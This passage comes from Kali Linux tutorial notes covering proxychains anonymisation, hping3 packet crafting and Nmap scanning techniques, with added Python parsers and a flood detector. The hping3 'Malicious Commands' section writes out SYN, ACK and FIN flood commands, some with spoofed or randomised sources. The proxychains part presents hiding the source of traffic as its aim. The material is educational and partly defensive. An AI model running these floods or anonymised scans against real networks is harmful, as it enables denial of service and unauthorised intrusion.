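# Proxy DNS requests - no leak for DNS data
#proxy_dns
tcp_read_time_out 15000
tcp_connect_time_out 8000
[ProxyList]
# defaults set to "tor"
socks4  127.0.0.1 9050
SOCKS5  198.51.100.20 1080
HTTPS   198.51.100.21 8080
"""

# Constructed: the same file after the fixes.
FIXED_CONF = """\
dynamic_chain
proxy_dns
[ProxyList]
socks4  127.0.0.1 9050
socks5  198.51.100.20 1080
http    198.51.100.21 8080
"""

if __name__ == "__main__":
    for label, conf in (("weak", WEAK_CONF), ("fixed", FIXED_CONF)):
        print(label, check_proxychains_conf(conf) or "OK")
```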

Step 3: Proxychains Syntax

3.1 Verify that proxychains is working.

proxychains firefox www.whatsmyip.org

3.2 Use Proxychains with nmap.

proxychains nmap 1.1.1.1

ProxyChains-3.1 (http://proxychains.sf.net)
Starting Nmap 7.70 ( https://nmap.org ) at 2019-07-14 22:00 CEST
Nmap scan report for one.one.one.one (1.1.1.1)
Host is up (0.013s latency).
Not shown: 997 filtered ports
PORT    STATE SERVICE
53/tcp  open  domain
80/tcp  open  http
443/tcp open  https

Nmap done: 1 IP address (1 host up) scanned in 57.22 seconds
root@iPhone:~#

Summary

We have covered how to run proxychains to hide the source of our traffic and stay anonymous.

Check out the Ethical Hacking notes for more Kali Linux quick guides.

DISCLAIMER: This software/tutorial is for educational purposes only.

The tutorial should not be used for illegal activity and the author is not responsible for its use or the users action.




How To Scan a Network With Hping3

Hping3

Hping3 is a command-line oriented TCP/IP packet assembler and analyser that works much like Nmap.

The application can send customized TCP/IP packets and display the target's replies the way ping does with ICMP echo replies. Hping3 supports the TCP, UDP, ICMP and RAW-IP protocols, has a traceroute mode, can transfer files over a covert channel, and has many other features, including DDoS flooding attacks.

Hping3 can be used to perform:

  • OS fingerprinting
  • ICMP pings
  • Traceroute
  • Port scanning
  • Firewall testing
  • Test IDSes
  • Network testing and auditing
  • MTU discovery
  • Exploit and vulnerabilities discovery
  • DDOS and ICMP flooding

Hping3 comes pre-installed with Kali Linux and can also be installed on most Linux distros; the commands need to be run with sudo privileges. Visit the official documentation at http://www.hping.org/documentation.php to learn more about how you can use Hping3.

Useful Options

-h Show this help
-v Show version
-c Packet count
-i --interval Wait interval between packets
--flood Send packets as fast as possible
-V Verbose mode
-D Debugging
-f Fragment packets
-Q Display sequence number

-0 RAW IP mode
-1 ICMP mode
-2 UDP mode
-8 SCAN mode
-9 listen mode

-F Set the FIN flag
-S Set the SYN flag
-P Set the PUSH flag
-A Set the ACK flag
-U Set the URG flag

Commands

Send an ACK packet to a target

hping3 -A 192.168.100.11

HPING 192.168.100.11 (eth0 192.168.100.11): A set, 40 headers + 0 data bytes
len=46 ip=192.168.100.11 ttl=128 id=29627 sport=0 flags=R seq=0 win=32767 rtt=4.0 ms
len=46 ip=192.168.100.11 ttl=128 id=29628 sport=0 flags=R seq=1 win=32767 rtt=2.0 ms
len=46 ip=192.168.100.11 ttl=128 id=29629 sport=0 flags=R seq=2 win=32767 rtt=2.0 ms
len=46 ip=192.168.100.11 ttl=128 id=29632 sport=0 flags=R seq=3 win=32767 rtt=2.0 ms
len=46 ip=192.168.100.11 ttl=128 id=29633 sport=0 flags=R seq=4 win=32767 rtt=0.6 ms
len=46 ip=192.168.100.11 ttl=128 id=29634 sport=0 flags=R seq=5 win=32767 rtt=8.0 ms
len=46 ip=192.168.100.11 ttl=128 id=29635 sport=0 flags=R seq=6 win=32767 rtt=7.1 ms
len=46 ip=192.168.100.11 ttl=128 id=29636 sport=0 flags=R seq=7 win=32767 rtt=7.0 ms
len=46 ip=192.168.100.11 ttl=128 id=29637 sport=0 flags=R seq=8 win=32767 rtt=5.0 ms

Use the -c option to decide on how many packets to send, in this example i am setting the count option to 5.

hping3 -A -c 5 192.168.100.11

HPING 192.168.100.11 (eth0 192.168.100.11): A set, 40 headers + 0 data bytes
len=46 ip=192.168.100.11 ttl=128 id=30010 sport=0 flags=R seq=0 win=32767 rtt=7.9 ms
len=46 ip=192.168.100.11 ttl=128 id=30011 sport=0 flags=R seq=1 win=32767 rtt=7.0 ms
len=46 ip=192.168.100.11 ttl=128 id=30012 sport=0 flags=R seq=2 win=32767 rtt=7.6 ms
len=46 ip=192.168.100.11 ttl=128 id=30013 sport=0 flags=R seq=3 win=32767 rtt=5.1 ms
len=46 ip=192.168.100.11 ttl=128 id=30014 sport=0 flags=R seq=4 win=32767 rtt=4.0 ms

--- 192.168.100.11 hping statistic ---
5 packets transmitted, 5 packets received, 0% packet loss
round-trip min/avg/max = 4.0/6.3/7.9 ms

Create a SYN packet and use the scan mode to scan port 1-1000 on a target.

hping3 -S -8 1-1000 192.168.100.11

Scanning 192.168.100.11 (192.168.100.11), port 1-1000
1000 ports to scan, use -V to see all the replies
+----+-----------+---------+---+-----+-----+-----+
|port| serv name |  flags  |ttl| id  | win | len |
+----+-----------+---------+---+-----+-----+-----+
   53 domain     : .S..A... 128 55677 64240    46
   88 kerberos   : .S..A... 128 55933 64240    46
  135 epmap      : .S..A... 128 56189 64240    46
  139 netbios-ssn: .S..A... 128 56445 64240    46
  389 ldap       : .S..A... 128 56701 64240    46
  445 microsoft-d: .S..A... 128 56957 64240    46
  464 kpasswd    : .S..A... 128 57213 64240    46
  593            : .S..A... 128 52863 64240    46
  636 ldaps      : .S..A... 128 53375 64240    46
All replies received. Done.
Not responding ports: (199 smux) (202 at-nbp) (203 ) (204 at-echo) (299 ) (300 ) (301 ) (306 ) (307 ) (308 ) (309 ) (312 ) (313 ) (407 ) (500 isakmp) (514 shell) (723 ) (729 ) (743 ) (761 ) (763 ) (764 ) (766 ) (767 ) (768 ) (769 ) (772 ) (782 ) (783 spamd) (784 ) (790 ) (791 ) (793 ) (794 ) (798 ) (799 ) (802 ) (803 ) (804 ) (805 ) (808 omirr) (809 ) (810 ) (811 ) (812 ) (813 ) (817 ) (818 ) (819 ) (820 ) (821 ) (822 ) (823 ) (824 ) (825 ) (827 ) (828 ) (829 ) (831 ) (832 ) (833 ) (834 ) (836 ) (837 ) (838 ) (839 ) (840 ) (841 ) (842 ) (843 ) (844 ) (845 ) (846 ) (847 ) (848 ) (849 ) (854 ) (855 ) (858 ) (878 ) (879 ) (880 ) (881 ) (911 ) (912 ) (913 ) (918 )
root@iPhone:~#
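The scan table above packs the interesting part into the flags column: ".S..A..." is a SYN+ACK, i.e. an open port, while the ACK probe earlier in this section was answered with "flags=R". The parser below is an added example, not part of this guide or of hping3: it reads the `-8` scan table and the "Not responding ports" summary into structured records, decodes the eight-character flag string, and also parses the key=value reply lines that the other modes print. The flag order FIN, SYN, RST, PSH, ACK, URG, then the two ECN bits hping3 calls X and Y, is inferred from the SYN+ACK rows above; the sample is an abbreviated copy of the scan output shown.

```python
import re

# Position of each flag letter in hping3's scan-table flag column (inferred from ".S..A...").
FLAG_ORDER = "FSRPAUXY"

# One table row:   53 domain     : .S..A... 128 55677 64240    46
ROW_RE = re.compile(
    r"^\s*(?P<port>\d+)\s+(?P<serv>\S*)\s*:\s+(?P<flags>[FSRPAUXY.]{8})\s+"
    r"(?P<ttl>\d+)\s+(?P<id>\d+)\s+(?P<win>\d+)\s+(?P<len>\d+)\s*$"
)
NOT_RESPONDING_RE = re.compile(r"\((\d+)\s*[^)]*\)")   # "(199 smux) (203 )"
KV_RE = re.compile(r"(\w+)=(\S+)")                     # "len=46 ip=... flags=R"


def decode_flags(flag_str):
    """Turn ".S..A..." into the set {"S", "A"}."""
    return {FLAG_ORDER[i] for i, c in enumerate(flag_str) if c != "."}


def classify(flags):
    """Port state implied by the reply to a SYN probe."""
    if {"S", "A"} <= flags:
        return "open"
    if "R" in flags:
        return "closed"
    return "other"


def parse_hping_scan(output):
    """Parse the table printed by 'hping3 -8 <ports> <target>' (with -S)."""
    result = {"replies": [], "not_responding": []}
    for line in output.splitlines():
        m = ROW_RE.match(line)
        if m:
            flags = decode_flags(m.group("flags"))
            result["replies"].append({
                "port": int(m.group("port")),
                "service": m.group("serv"),
                "flags": flags,
                "state": classify(flags),
                "ttl": int(m.group("ttl")),
                "win": int(m.group("win")),
            })
        elif line.startswith("Not responding ports:"):
            result["not_responding"] = [int(p) for p in NOT_RESPONDING_RE.findall(line)]
    return result


def parse_reply_line(line):
    """Parse a key=value reply line from the non-scan modes, e.g. the ACK-probe
    output "len=46 ip=192.168.100.11 ttl=128 ... flags=R seq=0 win=32767 rtt=4.0 ms"."""
    fields = dict(KV_RE.findall(line))
    if "flags" not in fields:
        return None
    fields["flags"] = set(fields["flags"])
    # A RST in answer to an ACK probe means the host is up and the port is not filtered.
    fields["unfiltered"] = fields["flags"] == {"R"}
    return fields


# Abbreviated copy of the scan output shown above (the not-responding list is shortened).
SAMPLE_SCAN = """\
Scanning 192.168.100.11 (192.168.100.11), port 1-1000
1000 ports to scan, use -V to see all the replies
+----+-----------+---------+---+-----+-----+-----+
|port| serv name |  flags  |ttl| id  | win | len |
+----+-----------+---------+---+-----+-----+-----+
   53 domain     : .S..A... 128 55677 64240    46
   88 kerberos   : .S..A... 128 55933 64240    46
  135 epmap      : .S..A... 128 56189 64240    46
  139 netbios-ssn: .S..A... 128 56445 64240    46
  389 ldap       : .S..A... 128 56701 64240    46
  445 microsoft-d: .S..A... 128 56957 64240    46
  464 kpasswd    : .S..A... 128 57213 64240    46
  593            : .S..A... 128 52863 64240    46
  636 ldaps      : .S..A... 128 53375 64240    46
All replies received. Done.
Not responding ports: (199 smux) (202 at-nbp) (203 ) (204 at-echo) (500 isakmp) (514 shell)
"""

if __name__ == "__main__":
    scan = parse_hping_scan(SAMPLE_SCAN)
    for r in scan["replies"]:
        print(f"{r['port']:>5} {r['service']:<12} {sorted(r['flags'])} -> {r['state']}")
    print("no reply:", scan["not_responding"])
```

The open-port list the parser produces (53, 88, 135, 139, 389, 445, 464, 593, 636) is the fingerprint of a domain controller, which is what the earlier NetBIOS enumeration guide found for SRV1 by a different route.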

Use UDP mode to send UDP packets to port 80 on a target; if the UDP port is open you will get a response back. This is useful when the target has blocked ICMP ping.

hping3 -2 192.168.100.17 -c 2 -p 80

Create a ping packet and use the ICMP mode.

hping3 -1 -c 4 192.168.100.11

HPING 192.168.100.11 (eth0 192.168.100.11): icmp mode set, 28 headers + 0 data bytes
len=46 ip=192.168.100.11 ttl=128 id=34163 icmp_seq=0 rtt=8.1 ms
len=46 ip=192.168.100.11 ttl=128 id=34164 icmp_seq=1 rtt=5.9 ms
len=46 ip=192.168.100.11 ttl=128 id=34167 icmp_seq=2 rtt=4.0 ms
len=46 ip=192.168.100.11 ttl=128 id=34168 icmp_seq=3 rtt=3.0 ms

--- 192.168.100.11 hping statistic ---
4 packets transmitted, 4 packets received, 0% packet loss
round-trip min/avg/max = 3.0/5.2/8.1 ms
root@iPhone:~#

Traceroute to a target using ICMP mode with verbose output.

hping3 --traceroute -V -1 192.168.100.11

using eth0, addr: 172.168.200.110, MTU: 1500
HPING google.com (eth0 216.58.211.142): icmp mode set, 28 headers + 0 data bytes
hop=1 TTL 0 during transit from ip=172.168.200.2 name=_gateway
hop=1 hoprtt=3.9 ms
hop=2 TTL 0 during transit from ip=192.168.10.1 name=UNKNOWN
hop=2 hoprtt=2.0 ms
hop=3 TTL 0 during transit from ip=10.33.221.74 name=UNKNOWN
hop=3 hoprtt=8.9 ms
hop=4 TTL 0 during transit from ip=88.129.174.18 name=gbg1.dr8.a3network.se
hop=4 hoprtt=8.9 ms
hop=5 TTL 0 during transit from ip=88.129.128.62 name=gbg1.a7network.se
hop=5 hoprtt=8.0 ms
hop=6 TTL 0 during transit from ip=85.8.9.16 name=gbg1.cr1.a3network.se
hop=6 hoprtt=6.9 ms
hop=7 TTL 0 during transit from ip=85.8.10.20 name=sto2.cr1.a3network.se

Traceroute to determine whether port 443 is open, with the local traffic generated from source port 8080.

hping3 --traceroute -V -S -p 443 -s 8080 google.com

using eth0, addr: 172.168.200.110, MTU: 1500
HPING google.com (eth0 216.58.211.142): S set, 40 headers + 0 data bytes
hop=1 TTL 0 during transit from ip=172.168.200.2 name=_gateway
hop=1 hoprtt=8.9 ms
len=46 ip=216.58.211.142 ttl=128 id=34374 tos=0 iplen=44
sport=443 flags=SA seq=8 win=64240 rtt=13.8 ms
seq=905581660 ack=1390210946 sum=3cce urp=0

len=46 ip=216.58.211.142 ttl=128 id=34376 tos=0 iplen=44
sport=443 flags=SA seq=9 win=64240 rtt=13.9 ms
seq=277232268 ack=486133387 sum=5a24 urp=0

len=46 ip=216.58.211.142 ttl=128 id=34377 tos=0 iplen=44
sport=443 flags=SA seq=10 win=64240 rtt=13.0 ms
seq=1939483389 ack=2029365982 sum=8498 urp=0

len=46 ip=216.58.211.142 ttl=128 id=34378 tos=0 iplen=44
sport=443 flags=SA seq=11 win=64240 rtt=12.9 ms
seq=90127368 ack=1561834414 sum=c208 urp=0

Use a fixed TTL in traceroute to check the IP addresses of load-balancing devices.

hping3 -S 192.168.100.100 -p 80 -T --ttl 13 --tr-keep-ttl -n 

Ping a subnet in randomized rather than sequential order, using the --rand-dest option and the interface option -I eth0.

hping3 -1 192.168.100.x --rand-dest -I eth0 

Send an ICMP timestamp request to a target. A target that has blocked ICMP echo responses won't answer pings, but it might still respond to timestamp requests.

hping3 -1 192.168.100.17 --icmp-ts -c 3

Malicious Commands

DISCLAIMER: This software/tutorial is for educational purposes only. It should not be used for illegal activity. The author is not responsible for its use or the users action, always perform the attacks on your own lab system.

Commonly used parameters.

  • The --flood parameter activates the fastest packet sending mode
  • The -p [DST_PORT] parameter specifies the destination port
  • The --spoof parameter specifies the IP address to use as the spoofed source
  • The --rand-source parameter activates a random source address
  • The --interface parameter specifies the interface

Main attack flags.

  • The -S parameter sets the SYN flag
  • The -A parameter sets the ACK flag
  • The -F parameter sets the FIN flag
  • The -R parameter sets the RESET flag
  • The -P parameter sets the PUSH flag
  • The -U parameter sets the URGENT flag

To start a SYN flood attack run the command below.

NOTE: When running these commands hping3 will not show any output; it is working in the background.

hping3 --flood -p [DST_PORT] [VICTIM_IP] -S

Use hping3 to run a SYN flood attack with an inactive spoofed IP address from the network.

hping3 --flood -p [DST_PORT] [VICTIM_IP] -S --spoof [INACTIVE_IP]

SYN flood attack with a random source IP address.

hping3 --flood -p [DST_PORT] [VICTIM_IP] -S --rand-source

ACK flood attack.

hping3 --flood -p [DST_PORT] [VICTIM_IP] -A

FIN flood attack.

hping3 --flood -p [DST_PORT] [VICTIM_IP] -F
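From the defender's side, the flag-specific floods listed above leave a characteristic signature: a burst of bare SYN, ACK or FIN segments toward one port, and with --rand-source almost every segment comes from a different address. The following added example (my own code, not part of the original guide) runs a window-based detector over a constructed packet log; the record format, the one-second window and the thresholds are assumptions chosen for the demonstration.

```python
import random
from collections import defaultdict

# Flag letter -> name of the flood the guide lists for that flag.
FLOOD_NAMES = {"S": "SYN flood", "A": "ACK flood", "F": "FIN flood"}


def build_sample_records():
    """Constructed packet records (timestamp_s, src_ip, dst_ip, dst_port, flags).

    Seconds 0-1: ten normal handshakes from one client.
    Second 2:    300 SYNs from random (spoofed) sources at port 80.
    Second 3:    150 bare ACKs from a single source at port 443.
    """
    rng = random.Random(7)  # fixed seed: the constructed sample is reproducible
    records = []
    for i in range(10):
        t = i * 0.1
        records.append((t, "10.0.0.5", "192.168.100.11", 443, "S"))
        records.append((t + 0.01, "10.0.0.5", "192.168.100.11", 443, "A"))
    for i in range(300):
        src = ".".join(str(rng.randrange(1, 224)) for _ in range(4))
        records.append((2.0 + i / 300, src, "192.168.100.11", 80, "S"))
    for i in range(150):
        records.append((3.0 + i / 150, "10.0.0.99", "192.168.100.11", 443, "A"))
    return records


def detect_floods(records, window=1.0, threshold=100, spoof_ratio=0.5):
    """Flag (destination, port) pairs that receive at least `threshold`
    bare SYN/ACK/FIN segments within one `window` of seconds.

    The ratio of distinct sources to packets separates a --rand-source style
    flood (almost every packet from a new address) from a single-source one.
    """
    buckets = defaultdict(lambda: {"count": 0, "sources": set()})
    for ts, src, dst, dport, flags in records:
        if flags not in FLOOD_NAMES:      # only bare S, A or F segments count
            continue
        bucket = buckets[(dst, dport, flags, int(ts // window))]
        bucket["count"] += 1
        bucket["sources"].add(src)

    alerts = []
    ordered = sorted(buckets.items(), key=lambda kv: (kv[0][3], kv[0][0], kv[0][1], kv[0][2]))
    for (dst, dport, flags, slot), b in ordered:
        if b["count"] < threshold:
            continue
        distinct = len(b["sources"])
        alerts.append({
            "target": f"{dst}:{dport}",
            "window_start": slot * window,
            "kind": FLOOD_NAMES[flags],
            "packets": b["count"],
            "distinct_sources": distinct,
            "source_pattern": ("random/spoofed sources" if distinct / b["count"] >= spoof_ratio
                               else "single or few sources"),
        })
    return alerts


if __name__ == "__main__":
    for alert in detect_floods(build_sample_records()):
        print(alert)
```

The normal traffic in second 0 stays well under the threshold, so only the two bursts are reported; the source-pattern field is what tells you whether blocking a single address would help or whether the flood is spoofed and needs upstream rate limiting.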

Conclusion

In this lab we have covered the basic hping3 commands: we assembled TCP and UDP packets and used them to scan networks and discover devices. As always with this kind of scan, make sure you are authorized to scan the network and devices you are targeting.




How To Scan a Network With Nmap

How To Scan With Nmap

Nmap is a great tool to learn: the application can scan and map networks and much more, and it is useful for everybody who works in IT.

It is the first tool I use when I want to troubleshoot; we can do a regular ping or a ping sweep that scans a range of the subnet or the whole subnet.

The application also offers host discovery, port discovery, operating system and version discovery, MAC address and service identification, and exploit and vulnerability detection.

Another great tool to use while learning nmap is Wireshark. It is highly recommended to run Wireshark while using nmap; following the flow of network traffic will help you analyze and visualize the scans.

We will try some of the popular scanning methods that can be used with nmap.

This guide is only meant to give you a high-level understanding of how to use the different scanning techniques.

Please don’t scan networks or hosts you are not authorized to scan. The networks and hosts scanned in this guide are my home lab.

If you want a more in-depth explanation of how to use nmap and its switches, I recommend that you read “The Official Nmap Project Guide to Network Discovery and Security Scanning”.

Save Output To Txt/Xml File

Description          | Command                      | Example
---------------------+------------------------------+----------------------------------
Save output to file  | nmap -oN [file.txt] [Target] | nmap -oN file.txt 192.168.100.11
Save output as XML   | nmap -oX [file.xml] [Target] | nmap -oX file.xml 192.168.100.11
Save in all formats  | nmap -oA [file] [Target]     | nmap -oA file 192.168.100.11

Basic Scanning

Description                  | Command                  | Example
-----------------------------+--------------------------+------------------------------------
Scan a single host           | nmap [Target]            | nmap 192.168.100.100
Scan multiple targets        | nmap [Target1] [Target2] | nmap 192.168.100.10 192.168.100.100
Scan a range of IP addresses | nmap [IP Range]          | nmap 192.168.100.10-99
Scan a Class C subnet        | nmap [IP/CIDR]           | nmap 192.168.100.0/24
Resolve FQDN                 | nmap [FQDN]              | nmap www.example.com

Quick Scans

Description                   | Command           | Example
------------------------------+-------------------+---------------------------
Ping scan                     | nmap -sP [Target] | nmap -sP 192.168.100.11
Ping scan (no port scanning)  | nmap -sn [Target] | nmap -sn 192.168.100.0/24

The -sP switch can be used when you want to make a quick ping; the host or hosts will reply to the ICMP ping packets.

nmap -sP 192.168.100.11

Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-26 21:05 W. Europe Daylight Time
Nmap scan report for 192.168.100.11
Host is up (0.0010s latency).
Nmap done: 1 IP address (1 host up) scanned in 5.84 seconds

The -sn switch is used to sweep a network without doing any port scans.

nmap -sn 192.168.100.0/24

Starting Nmap 7.70 ( https://nmap.org ) at 2019-06-02 00:02 W. Europe Daylight Time
Nmap scan report for 192.168.100.1
Host is up (0.0010s latency).
Nmap scan report for srv1.online-it.nu (192.168.100.11)
Host is up (0.0020s latency).
Nmap scan report for 192.168.100.13
Host is up (0.0010s latency).
Nmap scan report for srv7.home.local (192.168.100.17)
Host is up (0.0011s latency).
Nmap scan report for 192.168.100.100
Host is up (0.0013s latency).
Nmap done: 256 IP addresses (5 hosts up) scanned in 10.82 seconds

Banner Grabbing & Service Detection

Description           | Command           | Example
----------------------+-------------------+-------------------------
Detect OS             | nmap -O [Target]  | nmap -O 192.168.100.11
Detect OS & services  | nmap -A [Target]  | nmap -A 192.168.100.11
Detect services       | nmap -sV [Target] | nmap -sV 192.168.100.11

The -O switch scans for operating system details. This type of scan can be used to identify the operating system of the scanned host and the services the host is running.

nmap -O 192.168.100.11

Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-26 21:12 W. Europe Daylight Time
Nmap scan report for 192.168.100.11
Host is up (0.00032s latency).
Not shown: 988 closed ports
PORT     STATE SERVICE
53/tcp   open  domain
88/tcp   open  kerberos-sec
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
389/tcp  open  ldap
445/tcp  open  microsoft-ds
464/tcp  open  kpasswd5
593/tcp  open  http-rpc-epmap
636/tcp  open  ldapssl
3268/tcp open  globalcatLDAP
3269/tcp open  globalcatLDAPssl
3389/tcp open  ms-wbt-server
Device type: general purpose
Running: Microsoft Windows 2016
OS CPE: cpe:/o:microsoft:windows_server_2016
OS details: Microsoft Windows Server 2016 build 10586 - 14393
Network Distance: 2 hops

OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.96 seconds

Port Scans Types

Description                        | Command                      | Example
-----------------------------------+------------------------------+-------------------------------
Scan a single port                 | nmap -p [Port] [Target]      | nmap -p 80 192.168.100.11
Scan a range of ports              | nmap -p [Port-Port] [Target] | nmap -p 20-99 192.168.100.11
Fast scan (100 most common ports)  | nmap -F [Target]             | nmap -F 192.168.100.11
Scan using TCP handshake           | nmap -sT [Target]            | nmap -sT 192.168.100.11
Scan using TCP SYN (stealth)       | nmap -sS [Target]            | nmap -sS 192.168.100.11
Scan UDP ports                     | nmap -sU [Target]            | nmap -sU 192.168.100.11

The -sT switch completes a full TCP handshake with the target. This is considered more accurate than a SYN scan, but it is slower and is easily detected by firewalls and IDS.

nmap -sT 192.168.100.11

Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-26 21:18 W. Europe Daylight Time

Nmap scan report for 192.168.100.11
Host is up (1.0s latency).
Not shown: 986 closed ports
PORT     STATE    SERVICE
25/tcp   filtered smtp
53/tcp   open     domain
88/tcp   open     kerberos-sec
110/tcp  filtered pop3
135/tcp  open     msrpc
139/tcp  open     netbios-ssn
389/tcp  open     ldap
445/tcp  open     microsoft-ds
464/tcp  open     kpasswd5
593/tcp  open     http-rpc-epmap
636/tcp  open     ldapssl
3268/tcp open     globalcatLDAP
3269/tcp open     globalcatLDAPssl
3389/tcp open     ms-wbt-server

Nmap done: 1 IP address (1 host up) scanned in 219.83 seconds

Analysing the scan in Wireshark we can see that the open port responds to the handshake.

If the port is closed on the host, the target responds with a RST+ACK packet.

The -sS switch sends only a TCP SYN packet and waits for the SYN+ACK. If it receives a SYN+ACK on the probed port it answers with a RST packet instead of completing the handshake; in this way the scan can go undetected by the firewall. If the scanned port is closed, the target only responds with a RST packet.

nmap -sS 192.168.100.11

Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-26 21:24 W. Europe Daylight Time
Nmap scan report for 192.168.100.11

Host is up (0.0013s latency).
Not shown: 988 closed ports
PORT     STATE SERVICE
53/tcp   open  domain
88/tcp   open  kerberos-sec
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
389/tcp  open  ldap
445/tcp  open  microsoft-ds
464/tcp  open  kpasswd5
593/tcp  open  http-rpc-epmap
636/tcp  open  ldapssl
3268/tcp open  globalcatLDAP
3269/tcp open  globalcatLDAPssl
3389/tcp open  ms-wbt-server

Nmap done: 1 IP address (1 host up) scanned in 6.31 seconds

Analysing the packets in Wireshark we can see that we first send a SYN packet to the scanned port on the target host; if the port is open the target responds with a SYN+ACK packet and we answer with a RST packet.

If the port is closed on the scanned target we get a RST+ACK back.
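The -sn sweep and the -sS and -O reports above all use Nmap's normal output format. The added example below (my own code, not the guide's and not part of Nmap) parses that format into host objects, lists the open ports and compares them against an approved baseline, which is how these scans are used for inventory and drift detection on your own network. The embedded report is a constructed composite of the outputs shown above.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

# Constructed composite of the -sn sweep and the -sS/-O reports shown above.
SAMPLE_REPORT = """\
Starting Nmap 7.70 ( https://nmap.org ) at 2019-06-02 00:02 W. Europe Daylight Time
Nmap scan report for 192.168.100.1
Host is up (0.0010s latency).
Nmap scan report for srv1.online-it.nu (192.168.100.11)
Host is up (0.0020s latency).
Not shown: 988 closed ports
PORT     STATE SERVICE
53/tcp   open  domain
88/tcp   open  kerberos-sec
445/tcp  open  microsoft-ds
3389/tcp open  ms-wbt-server
OS details: Microsoft Windows Server 2016 build 10586 - 14393
Nmap scan report for srv7.home.local (192.168.100.17)
Host is up (0.0011s latency).
All 1000 scanned ports on 192.168.100.17 are closed
Nmap done: 256 IP addresses (3 hosts up) scanned in 10.82 seconds
"""

REPORT_RE = re.compile(r"^Nmap scan report for (?:(\S+) \((\d+\.\d+\.\d+\.\d+)\)|(\S+))$")
UP_RE = re.compile(r"^Host is up \(([\d.]+)s latency\)")
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)")
NOT_SHOWN_RE = re.compile(r"^Not shown: (\d+) (\S+) ports")
ALL_RE = re.compile(r"^All (\d+) scanned ports on \S+ are (\S+)")
OS_RE = re.compile(r"^OS details: (.+)$")


@dataclass
class Host:
    ip: str
    name: Optional[str] = None
    latency_s: Optional[float] = None
    ports: List[Tuple[int, str, str, str]] = field(default_factory=list)  # (port, proto, state, service)
    not_shown: Optional[Tuple[int, str]] = None   # (count, state) Nmap collapsed
    all_ports: Optional[Tuple[int, str]] = None   # (count, state) when every port agrees
    os_details: Optional[str] = None


def parse_nmap(text: str) -> List[Host]:
    """Parse Nmap's normal (-oN style) output into one Host per scan report."""
    hosts: List[Host] = []
    current: Optional[Host] = None
    for raw in text.splitlines():
        line = raw.strip()
        m = REPORT_RE.match(line)
        if m:
            current = Host(ip=m.group(2) or m.group(3), name=m.group(1))
            hosts.append(current)
            continue
        if current is None:
            continue
        if (m := UP_RE.match(line)):
            current.latency_s = float(m.group(1))
        elif (m := PORT_RE.match(line)):
            current.ports.append((int(m.group(1)), m.group(2), m.group(3), m.group(4)))
        elif (m := NOT_SHOWN_RE.match(line)):
            current.not_shown = (int(m.group(1)), m.group(2))
        elif (m := ALL_RE.match(line)):
            current.all_ports = (int(m.group(1)), m.group(2))
        elif (m := OS_RE.match(line)):
            current.os_details = m.group(1)
    return hosts


def open_ports(host: Host) -> List[int]:
    return sorted(p for p, _proto, state, _svc in host.ports if state == "open")


def unexpected_open_ports(host: Host, baseline: set) -> List[int]:
    """Open ports that are not in the approved baseline for this host:
    the drift a defender wants to notice between periodic scans."""
    return sorted(set(open_ports(host)) - set(baseline))


if __name__ == "__main__":
    for h in parse_nmap(SAMPLE_REPORT):
        print(h.ip, h.name, open_ports(h), h.os_details)
```

Run the same parser over `nmap -oN` files from successive scans and diff the `open_ports` lists per host; for anything beyond a quick script, Nmap's -oX output with an XML parser is the more robust route.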

The -sU switch scans UDP ports. UDP is a connectionless protocol: UDP packets do not carry any ACK flag, and the protocol does not require the receiver to confirm that it received a UDP packet.

If there is a firewall enabled on the host or on the network, the output will report “open|filtered” ports, that is, the list of ports the firewall blocks.

nmap -sU 192.168.100.11

Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-30 19:58 W. Europe Daylight Time

Nmap scan report for 192.168.100.11
Host is up (0.0016s latency).
Not shown: 997 open|filtered ports
PORT    STATE SERVICE
53/udp  open  domain
123/udp open  ntp
389/udp open  ldap

Nmap done: 1 IP address (1 host up) scanned in 17.27 seconds

If the firewall is disabled there will be no response back.

Inverse Scans

Description Command Example
Xmas scan nmap -sX [Target] nmap -sX 192.168.100.11
FIN scan nmap -sF [Target] nmap -sF 192.168.100.11
TCP Null scan nmap -sN [Target] nmap -sN 192.168.100.11
ACK scan nmap -sA [Target] nmap -sA 192.168.100.11

The -sX switch is called a Xmas scan. A Xmas scan sends a packet with multiple flags set: URG, PSH and FIN. If a port is closed, the host responds with a single RST packet. If a port is open, the host gives no response and Nmap reports the port as open|filtered. Modern operating systems, firewalls and IDS drop this kind of packet if they are properly configured.

We will run the Xmas scan against a Windows server with the firewall enabled.

nmap -sX 192.168.100.11

Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-30 17:07 W. Europe Daylight Time
Nmap scan report for 192.168.100.11
Host is up (0.0010s latency).
All 1000 scanned ports on 192.168.100.11 are open|filtered

Nmap done: 1 IP address (1 host up) scanned in 27.62 seconds

Observe the line “All 1000 scanned ports on 192.168.100.11 are open|filtered”: all scanned ports are reported “open|filtered”. This means that the firewall is enabled on the target host.

Let’s try the same scan, but this time we will disable the firewall on our target host.

nmap -sX 192.168.100.11

Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-30 17:13 W. Europe Daylight Time
Nmap scan report for 192.168.100.11
Host is up (0.0012s latency).
All 1000 scanned ports on 192.168.100.11 are closed

Nmap done: 1 IP address (1 host up) scanned in 6.78 seconds

Now we get “All 1000 scanned ports on 192.168.100.11 are closed”, which indicates that the firewall is disabled.

The -sF switch scans the host with a FIN scan. A FIN scan sends a packet with only the FIN flag set, which allows the packet to pass the firewall. If the port is open you will not get any response; if the port is closed the target responds with a RST packet.

When the firewall is enabled on the target the output will show an “open|filtered” response.

nmap -sF 192.168.100.11

Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-30 17:51 W. Europe Daylight Time
Nmap scan report for 192.168.100.11
Host is up (0.0010s latency).
All 1000 scanned ports on 192.168.100.11 are open|filtered

Nmap done: 1 IP address (1 host up) scanned in 27.19 seconds

If the firewall is disabled on the target the output will show an “are closed” response.

nmap -sF 192.168.100.11

Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-30 18:06 W. Europe Daylight Time
Nmap scan report for 192.168.100.11
Host is up (0.0019s latency).
All 1000 scanned ports on 192.168.100.11 are closed

